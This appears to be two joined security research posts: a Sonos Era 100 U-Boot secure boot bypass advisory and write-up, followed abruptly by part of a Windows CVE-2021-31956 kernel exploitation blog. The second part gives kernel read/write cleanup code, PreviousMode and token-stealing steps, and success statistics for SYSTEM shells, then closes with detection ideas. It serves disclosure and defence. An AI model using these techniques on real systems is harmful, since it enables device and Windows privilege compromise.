Vendor: Sonos
Vendor URL: https://www.sonos.com/
Versions affected:
* Confirmed 73.0-42060
Systems Affected: Sonos Era 100
Author: Ilya Zhuravlev
Advisory URL: Not provided by Sonos. Sonos state an update was released on 2023-11-15 which remediated the issue.
CVE Identifier: N/A
Risk: High
Summary
Sonos Era 100 is a smart speaker released in 2023. A vulnerability exists in the U-Boot component of the firmware which would allow for persistent arbitrary code execution with Linux kernel privileges. This vulnerability could be exploited either by an attacker with physical access to the device, or by obtaining write access to the flash memory through a separate runtime vulnerability.
Impact
An unsigned attacker-controlled rootfs may be loaded by the Linux kernel. This achieves a persistent bypass of the secure boot mechanism, providing early code execution within the Linux userspace under the /init process as the βrootβ user. It can be further escalated into kernel-mode arbitrary code execution by loading a custom kernel module.
Details
The implementation of the custom βsonosbootβ command loads the kernel image, performs the signature check, and then passes execution to the built-in U-Boot βbootmβ command. Since βbootmβ uses the βbootargsβ environment variable as Linux kernel arguments, the βsonosbootβ command initializes it with a call to `setenv`:
setenv(βbootargsβ,(char *)kernel_cmdline);
However, the return result of `setenv` is not checked. If this call fails, βbootargsβ will keep its previous value and βbootmβ will pass it to the Linux kernel.
On the Sonos Era 100 the U-Boot environment is loaded from the eMMC from address 0x500000. Whilst the factory image does not contain a valid U-Boot environment there, and we can confirm it through the presence of the β*** Warning β bad CRC, using default environmentβ warning message displayed on UART, it is possible to place a valid environment by directly writing to the eMMC with a hardware programmer.
There is a feature in U-Boot that allows setting environment variables as read-only. For example, setting βbootargs=somethingβ and then β.flags=bootargs:srβ would make any future writes to βbootargsβ fail. Thus, the Linux kernel will boot with an attacker-controlled βbootargsβ.
As a result, it is possible to fully control the Linux kernel command line. From there, an adversary could append the βinitrd=0xADDR,0xSIZEβ option to load their own initramfs, overwriting the one embedded in the image.
By replacing the β/initβ process it is then possible to obtain early persistent code execution on the device.Β
Recommendation
Consider setting CONFIG_ENV_IS_NOWHEREto disable loading of a U-boot environment from the flash memory.
Validate the return value of setenv and abort the boot process if the call fails.
Vendor Communication
Date
Communication
2023-09-04
Issue reported to vendor.
2023-09-07
Sonos has triaged report and is investigating.
2023-11-29
NCC queries Sonos for expected patch date.
2023-11-29
Sonos informs NCC that they already shipped a patch on the 15th Nov.
2023-11-30
NCC queries why there are no release notes, CVE, or credit for the issues.
2023-12-01
NCC informs Sonos that technical details will be published the w/c 4th Dec.
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.
Research performed by Ilya Zhuravlev supporting the Exploit
Development Group (EDG).
The Era 100 is Sonosβs flagship device, released on March 28th 2023
and is a notable step up from the Sonos One. It was also one of the
target devices for Pwn2Own
Toronto 2023. NCC found multiple security weaknesses within the
bootloader of the device which could be exploited leading to root/kernel
code execution and full compromise of the device.
According to Sonos, the issues reported were patched in an update
released on the 15th of November with no CVE issued or public details of
the security weakness. NCC is not aware of the full scope of devices
impacted by this issue. Users of Sonos devices should ensure to apply
any recent updates.
To develop an exploit eligible for the Pwn2Own contest, the first
step is to dump the firmware, gain initial access to the firmware, and
perhaps even set up debugging facilities to assist in debugging any
potential exploits.
In this article we will document the process of analyzing the
hardware, discovering several issues and developing a persistent secure
boot bypass for the Sonos Era 100.
Exploitation was also chained with a previously disclosed exploit
by bl4sty to obtain EL3 code
execution and obtain cryptographic key material.
Initial recon
After opening the device, we quickly identified UART pins broken out
on the motherboard:
The pinout is TX, RX, GND, Vcc
We can now attach a UART adapter and monitor the boot process:
SM1:BL:511f6b:81ca2f;FEAT:B0F02990:20283000;POC:F;RCY:0;EMMC:0;READ:0;0.0;0.0;CHK:0;
bl2_stage_init 0x01
bl2_stage_init 0xc1
bl2_stage_init 0x02
/* Skipped most of the log here */
U-Boot 2016.11-S767-Strict-Rev0.10 (Oct 13 2022 - 09:14:35 +0000)
SoC: Amlogic S767
Board: Sonos Optimo1 Revision 0x06
Reset: POR
cpu family id not support!!!
thermal ver flag error!
flagbuf is 0xfa!
read calibrated data failed
SOC Temperature -1 C
I2C: ready
DRAM: 1 GiB
initializing iomux_cfg_i2c
register usb cfg[0][1] = 000000007ffabde0
MMC: SDIO Port C: 0
*** Warning - bad CRC, using default environment
In: serial
Out: serial
Err: serial
Init Video as 1920 x 1080 pixel matrix
Net: dwmac.ff3f0000
checking cpuid allowlist (my cpuid is 2b:0b:17:00:01:17:12:00:00:11:33:38:36:55:4d:50)...
allowlist check completed
Hit any key to stop autoboot: 0
pending_unlock: no pending DevUnlock
Image header on sect 0
Magic: 536f7821
Version 1
Bootgen 0
Kernel Offset 40
Kernel Checksum 78c13f6f
Kernel Length a2ba18
Rootfs Offset 0
Rootfs Checksum 0
Rootfs Length 0
Rootfs Format 2
Image header on sect 1
Magic: 536f7821
Version 1
Bootgen 2
Kernel Offset 40
Kernel Checksum 78c13f6f
Kernel Length a2ba18
Rootfs Offset 0
Rootfs Checksum 0
Rootfs Length 0
Rootfs Format 2
Both headers OK, bootgens 0 2
uboot: section-1 selected
boot_state 0
364 byte kernel signature verified successfully
JTAG disabled
disable_usb: DISABLE_USB_BOOT fuse already set
disable_usb: DISABLE_JTAG fuse already set
disable_usb: DISABLE_M3_JTAG fuse already set
disable_usb: DISABLE_M4_JTAG fuse already set
srk_fuses: not revoking any more SRK keys (0x1)
srk_fuses: locking SRK revocation fuses
Start the watchdog timer before starting the kernel...
get_kernel_config [id = 1, rev = 6] returning 22
## Loading kernel from FIT Image at 00100040 ...
Using 'conf@23' configuration
Trying 'kernel@1' kernel subimage
Description: Sonos Linux kernel for S767
Type: Kernel Image
Compression: lz4 compressed
Data Start: 0x00100128
Data Size: 9076344 Bytes = 8.7 MiB
Architecture: AArch64
OS: Linux
Load Address: 0x01080000
Entry Point: 0x01080000
Hash algo: crc32
Hash value: 2e036fce
Verifying Hash Integrity ... crc32+ OK
## Loading fdt from FIT Image at 00100040 ...
Using 'conf@23' configuration
Trying 'fdt@23' fdt subimage
Description: Flattened Device Tree Sonos Optimo1 V6
Type: Flat Device Tree
Compression: uncompressed
Data Start: 0x00a27fe8
Data Size: 75487 Bytes = 73.7 KiB
Architecture: AArch64
Hash algo: crc32
Hash value: adbd3c21
Verifying Hash Integrity ... crc32+ OK
Booting using the fdt blob at 0xa27fe8
Uncompressing Kernel Image ... OK
Loading Device Tree to 00000000417ea000, end 00000000417ff6de ... OK
Starting kernel ...
vmin:32 b5 0 0!
From this log, we can see that the boot process is very similar to
other Sonos devices. Moreover, despite the marking on the SoC and the
boot log indicating an undocumented Amlogic S767a chip, the first line
of the BootROM log containing βSM1β points us to S905X3, which has a
datasheet available.
Whilst itβs possible to interrupt the U-Boot boot process, Sonos has
gone through several rounds of boot hardening and by now the U-Boot
console is only accessible with a password that is stored hashed inside
the U-Boot binary. Additionally, the set of accessible U-Boot commands
is heavily restricted.
Dumping the eMMC
Continuing probing the PCB, it was possible to locate eMMC data pins
next in order to attempt an in-circuit eMMC dump. From previous
generations of Sonos devices, we knew that the data on the flash is
mostly encrypted. Nevertheless, an in-circuit eMMC connection would also
allow to rapidly modify the flash memory contents, without having to
take the chip off and put it back on every time.
By probing termination resistors and test points located in the
general area between the SoC and the eMMC chip, first with an
oscilloscope and then with a logic analyzer, it was possible to identify
several candidates for eMMC lines.
To perform an in-circuit dump, we have to connect CLK, CMD, DAT0 and
ground at the minimum. While CLK and CMD are pretty obvious from the
above capture, there are multiple candidates for the DAT0 pin. Moreover,
we could only identify 3 out of 4 data pins at this point. Fortunately,
after trying all 3 of these, it was possible to identify the following
connections:
Note that the extra pin marked as βINTβ here is used to interrupt the
BootROM boot process. By connecting it to ground during boot, the
BootROM gets stuck trying to boot from SPINOR, which allows us to
communicate on the eMMC lines without interference.
From there, it was possible to dump the contents of eMMC and confirm
that the bulk of the firmware including the Linux rootfs was
encrypted.
Investigating U-Boot
While we were unable to get access to the Sonos Era 100 U-Boot binary
just yet, previous work on Sonos devices enabled us to obtain a
plaintext binary for the Sonos One U-Boot. At this point we were hoping
that the images would be mostly the same, and that a vulnerability
existed in U-Boot that could be exploited in a black-box manner
utilizing the eMMC read-write capability.
Several such issues were identified and are documented below.
Issue 1: Stored environment
Despite the device not utilizing the stored environment feature of
U-Boot, thereβs still an attempt to load the environment from flash at
startup. This appears to stem from a misconfiguration where the
CONFIG_ENV_IS_NOWHERE flag is not set in U-Boot. As a
result, during startup it will try to load the environment from flash
offset 0x500000. Since thereβs no valid environment there,
it displays the following warning message over UART:
*** Warning - bad CRC, using default environment
The message goes away when a valid environment is written to that
location. This enables us to set variables such as bootcmd,
essentially bypassing the password-protected Sonos U-Boot console.
However, as mentioned above, the available commands are heavily
restricted.
Issue 2: Unchecked setenv()
call
By default on the Sonos Era 100, U-Bootβs βbootcmdβ is set to
βsonosbootβ. To understand the overall boot process, it was possible to
reverse engineer the custom βsonosbootβ handler. On a high level, this
command is responsible for loading and validating the kernel image after
which it passes control to the U-Boot βbootmβ built-in. Because βbootmβ
uses U-Boot environment variables to control the arguments passed to the
Linux kernel, βsonosbootβ makes sure to set them up first before passing
control:
setenv("bootargs",(char*)kernel_cmdline);
There is however no check on the return value of this
setenv call. If it fails, the variable will keep its
previous value, which in our case is the value loaded from the stored
environment.
As it turns out, it is possible to make this setenv call
fail. A somewhat obscure feature of U-Boot allows marking
variables as read-only. For example, by setting
β.flags=bootargs:srβ, the βbootargsβ variable becomes read-only and all
future writes without the H_FORCE flag fail.
All we have to do at this point to exploit this issue is to construct
a stored environment that first defines the βbootargsβ value, and then
sets it as read-only by defining β.flags=bootargs:srβ. The execution of
βsonosbootβ will then proceed into βbootmβ and it will start the Linux
kernel with fully controlled command-line arguments.
One way to obtain code execution from there is to insert an
βinitrd=0xADDR,0xSIZEβ argument which will cause the Linux kernel to
load an initramfs from memory at the specified address, overriding the
built-in image.
Issue 3: Malleable firmware
image
The exploitation process described above, however, requires that
controlled data is placed at a known static address. One way it was
found to do that is to abuse the custom Sonos
image header. According to U-Boot logs, this is always loaded at
address 0x100000:
## Loading kernel from FIT Image at 00100040 ...
Using 'conf@23' configuration
Trying 'kernel@1' kernel subimage
Description: Sonos Linux kernel for S767
Type: Kernel Image
Compression: lz4 compressed
Data Start: 0x00100128
Data Size: 9076344 Bytes = 8.7 MiB
Architecture: AArch64
OS: Linux
Load Address: 0x01080000
Entry Point: 0x01080000
Hash algo: crc32
Hash value: 2e036fce
Verifying Hash Integrity ... crc32+ OK
The image header can be represented in pseudocode as follows:
The issue is that while the value of kernel_offset is
normally 0x40, it is not enforced by U-Boot. By setting the offset to a
higher value and then filling the empty space with arbitrary data, we
can place the data at a known fixed location in U-Boot memory while
ensuring that the signature check on the image still passes.
Combining all three issues outlined above, it is possible to achieve
persistent code execution within Linux under the /init process as the
βrootβ user.
Moreover, by inserting a kernel module this access can be escalated
to kernel-mode arbitrary code execution.
Epilogue
Thereβs just one missing piece and that is to dump the one time
programmable (OTP) data so that we can decrypt any future firmware.
Fortunately, the factory firmware that the device came pre-flashed with
does not contain a fix for the vulnerability disclosed in
https://haxx.in/posts/dumping-the-amlogic-a113x-bootrom/
From there, slight modifications are required to adjust the exploit
for the different EL3 binary of this device. The arbitrary read
primitive provided by the a113x-el3-pwn tool works as-is
and allows for the EL3 image to be dumped. With the adjusted exploit we
were then able to dump full OTP contents and decrypt any future firmware
update for this device.
Disclosure Timeline
Date
Action
2023-09-04
NCC reports issues to Sonos
2023-09-07
Sonos has triaged report and is investigating
2023-11-29
NCC queries Sonos for expected patch date
2023-11-29
Sonos informs NCC that they already shipped a patch on the 15th
Nov
2023-11-30
NCC queries why no release notes, CVE or credit for the issues
2023-12-01
NCC informs Sonos that technical details will be published the w/c
4th Dec
An overview of the vulnerability assigned CVE-2021-31956 (NTFS Paged Pool Memory corruption) and how to trigger
An introduction into the Windows Notification Framework (WNF) from an exploitation perspective
Exploit primitives which can be built using WNF
In this article I aim to build on that previous knowledge and cover the following areas:
Exploitation without the CVE-2021-31955 information disclosure
Enabling better exploit primitives through PreviousMode
Reliability, stability and exploit clean-up
Thoughts on detection
The version targeted within this blog was Windows 10 20H2 (OS Build 19042.508). However, this approach has been tested on all Windows versions post 19H1 when the segment pool was introduced.
Exploitation without CVE-2021-31955 information disclosure
I hinted in the previous blog post that this vulnerability could likely be exploited without the usage of the separate EPROCESS address leak vulnerability CVE-2021-31955). This was also realised too by Yan ZiShuang and documented within the blog post.
Typically, for Windows local privilege escalation, once an attacker has achieved arbitrary write or kernel code execution then the aim will be to escalate privileges for their associated userland process or pan a privileged command shell. Windows processes have an associated kernel structure called _EPROCESS which acts as the process object for that process. Within this structure, there is a Token member which represents the processβs security context and contains things such as the token privileges, token types, session id etc.
CVE-2021-31955 lead to an information disclosure of the address of the _EPROCESS for each running process on the system and was understood to be used by the in-the-wild attacks found by Kaspersky. However, in practice for exploitation of CVE-2021-31956 this separate vulnerability is not needed.
This is due to the _EPROCESS pointer being contained within the _WNF_NAME_INSTANCE as the CreatorProcess member:
Therefore, provided that it is possible to get a relative read/write primitive using a _WNF_STATE_DATA to be able to read and{write to a subsequent _WNF_NAME_INSTANCE, we can then overwrite the StateData pointer to point at an arbitrary location and also read the CreatorProcess address to obtain the address of the _EPROCESS structure within memory.
The initial pool layout we are aiming is as follows:
The difficulty with this is that due to the low fragmentation heap (LFH) randomisation, it makes reliably achieving this memory layout more difficult and iteration one of this exploit stayed away from the approach until more research was performed into improving the general reliability and reducing the chances of a BSOD.
As an example, under normal scenarios you might end up with the following allocation pattern for a number of sequentially allocated blocks:
In the absense of an LFH "Heap Randomisation" weakness or vulnerability, then this post explains how it is possible to achieve a "reasonably" high level of exploitation success and what necessary cleanups need to occur in order to maintain system stability post exploitation.
Stage 1: The Spray and Overflow
Starting from where we left off in the first article, we need to go back and rework the spray and overflow.
Firstly, our _WNF_NAME_INSTANCE is 0xA8 + the POOL_HEADER (0x10), so 0xB8 in size. As mentioned previously this gets put into a chunk of size 0xC0.
We also need to spray _WNF_STATE_DATA objects of size 0xA0 (which when added with the header 0x10 + the POOL_HEADER (0x10) we also end up with a chunk allocated of 0xC0.
As mentioned within part 1 of the article, since we can control the size of the vulnerable allocation we can also ensure that our overflowing NTFS extended attribute chunk is also allocated within the 0xC0 segment.
However, we cannot deterministically know which object will be adjacent to our vulnerable NTFS chunk (as mentioned above), we cannot take a similar approach of freeβing holes as in the past article and then reusing the resulting holes, as both the _WNF_STATE_DATA and _WNF_NAME_INSTANCE objects are allocated at the same time, and we need both present within the same pool segment.
Therefore, we need to be very careful with the overflow. We make sure that only the following fields are overflowed by 0x10 bytes (and the POOL_HEADER).
In the case of a corrupted _WNF_NAME_INSTANCE, both the Header and RunRef members will be overflowed:
As we donβt know if we are going to overflow a _WNF_NAME_INSTANCE or a _WNF_STATE_DATA first, then we can trigger the overflow and check for corruption by loop through querying each _WNF_STATE_DATA using NtQueryWnfStateData.
If we detect corruption, then we know we have identified our _WNF_STATE_DATA object. If not, then we can repeatedly trigger the spray and overflow until we have obtained a _WNF_STATE_DATA object which allows a read/write across the pool subsegment.
There are a few problems with this approach, some which can be addressed and some which there is not a perfect solution for:
We only want to corrupt _WNF_STATE_DATA objects but the pool segment also contains _WNF_NAME_INSTANCE objects due to needing to be the same size. Using only a 0x10 data size overflow and cleaning up afterwards (as described in the Kernel Memory Cleanup section) means that this issue does not cause a problem.
Occasionally our unbounded _WNF_STATA_DATA containing chunk can be allocated within the final block within the pool segment. This means that when querying with NtQueryWnfStateData an unmapped memory read will occur off the end of the page. This rarely happens in practice and increasing the spray size reduces the likelihood of this occurring (see Exploit Testing and Statistics section).
Other operating system functionality may make an allocation within the 0xC0 pool segment and lead to corruption and instability. By performing a large spray size before triggering the overflow, from practical testing, this seems to rarely happen within the test environment.
I think itβs useful to document these challenges with modern memory corruption exploitation techniques where itβs not always possible to gain 100% reliability.
Overall with 1) remediated and 2+3 only occurring very rarely, in lieu of a perfect solution we can move to the next stage.
Stage 2: Locating a _WNF_NAME_INSTANCE and overwriting the StateData pointer
Once we have unbounded our _WNF_STATE_DATA by overflowing the DataSize and AllocatedSize as described above, and within the first blog post, then we can then use the relative read to locate an adjacent _WNF_NAME_INSTANCE.
By scanning through the memory we can locate the pattern "\x03\x09\xa8" which denotes the start of a _WNF_NAME_INSTANCE and from this obtain the interesting member variables.
The CreatorProcess, StateName, StateData, ScopeInstance can be disclosed from the identified target object.
We can then use the relative write to replace the StateData pointer with an arbitrary location which is desired for our read and write primitive. For example, an offset within the _EPROCESS structure based on the address which has been obtained from CreatorProcess.
Care needs to be taken here to ensure that the new location StateData points at overlaps with sane values for the AllocatedSize, DataSize values preceding the data wishing to be read or written.
In this case the aim was to achieve a full arbitrary read and write but without having the constraints of needing to find sane and reliable AllocatedSize and DataSize values prior to the memory which it was desired to write too.
Our overall goal was to target the KTHREAD structureβs PreviousMode member and then make use of make use of the APIs NtReadVirtualMemory and NtWriteVirtualMemory to enable a more flexible arbitrary read and write.
It helps to have a good understanding of how these kernel memory structure are used to understand how this works. In a massively simplified overview, the kernel mode portion of Windows contains a number of subsystems. The hardware abstraction layer (HAL), the executive subsystems and the kernel. _EPROCESS is part of the executive layer which deals with general OS policy and operations. The kernel subsystem handles architecture specific details for low level operations and the HAL provides a abstraction layer to deal with differences between hardware.
Processes and threads are represeted at both the executive and kernel "layer" within kernel memory as _EPROCESS and _KPROCESS and _ETHREAD and _KTHREAD structures respectively.
The documentation on PreviousMode states "When a user-mode application calls the Nt or Zw version of a native system services routine, the system call mechanism traps the calling thread to kernel mode. To indicate that the parameter values originated in user mode, the trap handler for the system call sets the PreviousMode field in the thread object of the caller to UserMode. The native system services routine checks the PreviousMode field of the calling thread to determine whether the parameters are from a user-mode source."
Looking at MiReadWriteVirtualMemory which is called from NtWriteVirtualMemory we can see that if PreviousMode is not set when a user-mode thread executes, then the address validation is skipped and kernel memory space addresses can be written too:
This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.
So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.
From this we can calculate the base address of the _KTHREAD using the offset of 0x2F8 i.e. the ThreadListEntry offset.
0xffffd18606a54378 - 0x2F8 = 0xffffd18606a54080
We can check this correct (and see we hit our breakpoint in the previous article):
This technique was also covered previously within the NCC Group blog post on Exploiting Windows KTM too.
So how would we go about locating PreviousMode based on the address of _EPROCESS obtained from our relative read of CreatorProcess? At the start of the _EPROCESS structure, _KPROCESS is included as Pcb.
Once we have set the StateData pointer of the _WNF_NAME_INSTANCE prior to the _KPROCESSThreadListHead Flink we can leak out the value by confusing it with the DataSize and the ChangeTimestamp, we can then calculate the FLINK as βFLINK = (uintptr_t)ChangeTimestamp << 32 | DataSize` after querying the object.
This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.
Once we have the address of the _KTHREAD we need to again find a sane value to confuse with the AllocatedSize and DataSize to allow reading and writing of PreviousMode value at offset 0x232.
Allowing the most significant word of the Process pointer shown above to be used as the AllocatedSize and the UserAffinity to act as the DataSize. Incidentally, we can actually influence this value used for DataSize using SetProcessAffinityMask or launching the process with start /affinity exploit.exe but for our purposes of being able to read and write PreviousMode this is fine.
Visually this looks as follows after the StateData has been modified:
This gives a 3 byte read (and up to 0xffff900f bytes write if needed β but we only need 3 bytes), of which the PreviousMode is included (i.e set to 1 before modification):
00 00 01 00 00 00 00 00 00 00 | ..........
Using the most significant word of the pointer with it always being a kernel mode address, should ensure that this is a sufficient AllocatedSize to enable overwriting PreviousMode.
Post Exploitation
Once we have set PreviousMode to 0, as mentioned above, this now gives an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful method and demonstrates how moving from an awkward to use arbitrary read/write to a better method which enables easier post exploitation and enhanced clean up options.
It is then trivial to walk the ActiveProcessLinks within the EPROCESS, obtain a pointer to a SYSTEM token and replace the existing token with this or to perform escalation by overwriting the _SEP_TOKEN_PRIVILEGES for the existing token using techniques which have been long used by Windows exploits.
Kernel Memory Cleanup
OK, so the above is good enough for a proof of concept exploit but due to the potentially large amount of memory writes needing to occur for exploit success, then it could leave the kernel in a bad state. Also, when the process terminates then certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.
This part of the exploitation process is often overlooked by proof of concept exploit writers but is often the most challenging for use in real world scenarioβs (red teams / simulated attacks etc) where stability and reliability are important. Going through this process also helps understand how these types of attacks can also be detected.
This section of the blog describes some improvements which can be made in this area.
PreviousMode Restoration
On the version of Windows tested, if we try to launch a new process as SYSTEM but PreviousMode is still set to 0. Then we end up with the following crash:
More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.
This can be fixed simply by using our NtWriteVirtualMemory APIs to restore the PreviousMode value to 1 before launching the cmd.exe shell.
StateData Pointer Restoration
The _WNF_STATE_DATAStateData pointer is freeβd when the _WNF_NAME_INSTANCE is freed on process termination (incidentially also an arbitrary free). If this is not restored to the original value, we will end up with a crash as follows:
Although we could restore this using the WNF relative read/write, as we have arbitrary read and write using the APIs, we can implement a function which uses a previously saved ScopeInstance pointer to search for the StateName of our targeted _WNF_NAME_INSTANCE object address.
Visually this looks as follows:
Some example code for this is:
/*** This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES. * The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)**/QWORD*FindStateName(unsigned__int64 StateName){ QWORD* i;// _WNF_SCOPE_INSTANCE+0x38 (NameSet)for (i = (QWORD*)read64((char*)BackupScopeInstance+0x38); ; i = (QWORD*)read64((char*)i +0x8)) {while (1) {if (!i)return0;// StateName is 0x18 after the TreeLinks FLINK QWORD CurrStateName = (QWORD)read64((char*)i +0x18);if (StateName >= CurrStateName)break; i = (QWORD*)read64(i); } QWORD CurrStateName = (QWORD)read64((char*)i +0x18);if (StateName <= CurrStateName)break; }return (QWORD*)((QWORD*)i -2);}
Then once we have obtained our _WNF_NAME_INSTANCE we can then restore the original StateData pointer.
RunRef Restoration
The next crash encountered was related to the fact that we may have corrupted many RunRef from _WNF_NAME_INSTANCEβs in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called and an invalid value is present, we will crash as follows:
To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.
Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.
As you can see there is a member TemporaryNamesListHead which is a linked list of the addresses of the TemporaryNamesListHead within the _WNF_NAME_INSTANCE.
Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.
We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).
An example of this is:
/*** This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. * This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.**/voidFindCorruptedRunRefs(LPVOID wnf_process_context_ptr){// +0x040 TemporaryNamesListHead : _LIST_ENTRY LPVOID first = read64((char*)wnf_process_context_ptr +0x40); LPVOID ptr; for (ptr = read64(read64((char*)wnf_process_context_ptr +0x40)); ; ptr = read64(ptr)) {if (ptr == first) return;// +0x088 TemporaryNameListEntry : _LIST_ENTRY QWORD* nameinstance = (QWORD*)ptr -17; QWORD header = (QWORD)read64(nameinstance);if (header !=0x0000000000A80903) {// Fix the header up. write64(nameinstance, 0x0000000000A80903);// Fix the RunRef up. write64((char*)nameinstance +0x8, 0); } }}
NTOSKRNL Base Address
Whilst this isnβt actually needed by the exploit, I had the need to obtain NTOSKRNL base address to speed up some examinations and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, then the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into the wait state, we can then walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.
The following output shows the thread whilst in the wait state:
As there are some elements of instability and non-deterministic elements of this exploit, then an exploit testing framework was developed to determine the effectiveness across multiple runs and on multiple different supported platforms and by varying the exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with potentially other third party drivers etc installed and a more noisy kernel pool, it gives some indication of this approach is feasible and also feeds into possible detection mechanisms.
The key variables which can be modified with this exploit are:
Spray size
Post-exploitation choices
All these are measured over 100 iterations of the exploit (over 5 runs) for a timeout duration of 15 seconds (i.e. a BSOD did not occur within 15 seconds of an execution of the exploit).
SYSTEM shells β Number of times a SYSTEM shell was launched.
Total LFH Writes β For all 100 runs of the exploit, how many corruptions were triggered.
Avg LFH Writes β Average number of LFH overflows needed to obtain a SYSTEM shell.
Failed after 32 β How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the max number of overflow attempts. 32 was chosen a semi-arbitrary value based on empirical testing and the blocks in the BlockBitmap for the LFH being scanned by groups of 32 blocks.
BSODs on exec β Number of times the exploit BSOD the box on execution.
Unmapped Read β Number of times the relative read reaches unmapped memory (ExpWnfReadStateData) β included in the BSOD on exec count above.
Spray Size Variation
The following statistics show runs when varying the spray size.
Spray size 3000
Result
Run 1
Run 2
Run 3
Run 4
Run 5
Avg
SYSTEM shells
85
82
76
75
75
78
Total LFH writes
708
726
707
678
624
688
Avg LFH writes
8
8
9
9
8
8
Failed after 32
1
3
2
1
1
2
BSODs on exec
14
15
22
24
24
20
Unmapped Read
4
5
8
6
10
7
Spray size 6000
Result
Run 1
Run 2
Run 3
Run 4
Run 5
Avg
SYSTEM shells
84
80
78
84
79
81
Total LFH writes
674
643
696
762
706
696
Avg LFH writes
8
8
9
9
8
8
Failed after 32
2
4
3
3
4
3
BSODs on exec
14
16
19
13
17
16
Unmapped Read
2
4
4
5
4
4
Spray size 10000
Result
Run 1
Run 2
Run 3
Run 4
Run 5
Avg
SYSTEM shells
84
85
87
85
86
85
Total LFH writes
805
714
761
688
694
732
Avg LFG writes
9
8
8
8
8
8
Failed after 32
3
5
3
3
3
3
BSODs on exec
13
10
10
12
11
11
Unmapped Read
1
0
1
1
0
1
Spray size 20000
Result
Run 1
Run 2
Run 3
Run 4
Run 5
Avg
SYSTEM shells
89
90
94
90
90
91
Total LFH writes
624
763
657
762
650
691
Avg LFG writes
7
8
7
8
7
7
Failed after 32
3
2
1
2
2
2
BSODs on exec
8
8
5
8
8
7
Unmapped Read
0
0
0
0
1
0
From this was can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read (due to the page not being mapped) and thus reducing the number of BSODs.
On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.
Post Exploitation Method Variation
I also experimented with the post exploitation method used (token stealing vs modifying the existing token). The reason for this is that performing the token stealing method there are more kernel reads/writes and a longer time duration between reverting PreviousMode.
20000 spray size
With all the _SEP_TOKEN_PRIVILEGES enabled:
Result
Run 1
Run 2
Run 3
Run 4
Run 5
Avg
PRIV shells
94
92
93
92
89
92
Total LFH writes
939
825
825
788
724
820
Avg LFG writes
9
8
8
8
8
8
Failed after 32
2
2
1
2
0
1
BSODs on exec
4
6
6
6
11
6
Unmapped Read
0
1
1
2
2
1
Therefore, there is only negligible difference these two methods.
Detection
After all of this is there anything we have learned which could help defenders?
Well firstly there is a patch out for this vulnerability since the 8th of June 2021. If your reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on
However, there are some engineering insights which can be gained from this and in general detecting memory corruption exploits within the wild. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post exploitation technique detection (token stealing etc) which have been covered in many online articles. As I never had access to the in the wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should allow security researchers a greater understanding in this area.
The main artifacts from this exploit are:
NTFS Extended Attributes being created and queried.
WNF objects being created (as part of the spray)
Failed exploit attempts leading to BSODs
NTFS Extended Attributes
Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.
This can be captured as part of an ETW trace:
As this vulnerability can be exploited a low integrity (and thus from a sandbox), then the detection mechanisms would vary based on if an attacker had local code execution or chained it together with a browser exploit.
One idea for endpoint detection and response (EDR) based detection would be that a browser render process executing both of these actions (in the case of using this exploit to break out of a browser sandbox) would warrant deeper investigation. For example, whilst loading a new tab and web page, the browser process "MicrosoftEdge.exe" triggers these events legitimately under normal operation, whereas the sandboxed renderer process "MicrosoftEdgeCP.exe" does not. Chrome while loading a new tab and web page did not trigger either of the events too. I didnβt explore too deeply if there were any render operations which could trigger this non-maliciously but provides a place where defenders can explore further.
WNF Operations
The second area investigated was to determine if there were any ETW events produced by WNF based operations. Looking through the "Microsoft-Windows-Kernel-*" providers I could not find any related events which would help in this area. Therefore, detecting the spray through any ETW logging of WNF operations did not seem feasible. This was expected due to the WNF subsystem not being intended for use by non-MS code.
Crash Dump Telemetry
Crash Dumps are a very good way to detect unreliable exploitation techniques or if an exploit developer has inadvertently left their development system connected to a network. MS08-067 is a well known example of Microsoft using this to identify an 0day from their WER telemetry. This was found by looking for shellcode, however, certain crashes are pretty suspicious when coming from production releases. Apple also seem to have added telemetry to iMessage for suspicious crashes too.
In the case of this specific vulnerability when being exploited with WNF, there is a slim chance (approx. <5%) that the following BSOD can occur which could act a detection artefact:
